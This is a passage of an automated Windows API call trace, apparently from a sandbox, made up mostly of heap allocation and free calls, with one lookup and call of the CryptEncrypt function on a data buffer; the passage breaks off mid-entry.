[0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0231.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0231.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0231.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0231.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0231.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0231.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0231.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0231.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0231.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0231.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xad28) returned 0x2f3fce0 [0231.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3fce0 | out: hHeap=0x970000) returned 1 [0231.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0231.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0231.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0231.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0231.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978490 [0231.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0231.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0231.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0231.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0231.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0231.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0231.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0231.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0231.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0231.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0231.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0231.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0231.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0231.363] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0231.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0231.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0231.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0231.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0231.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0231.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0231.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0231.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0231.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0231.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0231.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0231.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0231.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0231.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0231.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0231.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0231.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0231.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0231.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0231.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0231.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0231.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0231.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0231.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0231.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0231.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0231.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0231.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0231.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0231.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0231.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0231.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0231.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0231.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0231.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0231.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0231.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0231.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0231.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0231.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0231.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0231.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51430 [0231.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51430, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0231.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0231.366] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0231.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0231.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f558 [0231.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0231.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0231.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0231.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0231.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0231.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0231.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0231.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0231.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0231.367] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f34fa8*, pdwDataLen=0x8cef60*=0xad28, dwBufLen=0xad30 | out: pbData=0x2f34fa8*, pdwDataLen=0x8cef60*=0xad30) returned 1 [0231.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0231.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0231.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0231.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0231.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0231.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0231.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0231.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0231.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0231.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0231.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0231.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0231.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0231.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0231.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0231.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0231.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0231.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0231.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0231.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0231.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0231.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0231.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0231.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0231.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0231.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0231.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0231.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0231.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0231.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0231.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0231.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0231.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0231.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0231.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0231.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0231.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0231.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0231.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0231.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0231.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0231.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0231.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0231.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0231.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0231.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0231.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0231.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0231.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0231.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0231.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0231.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0231.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0231.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0231.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: 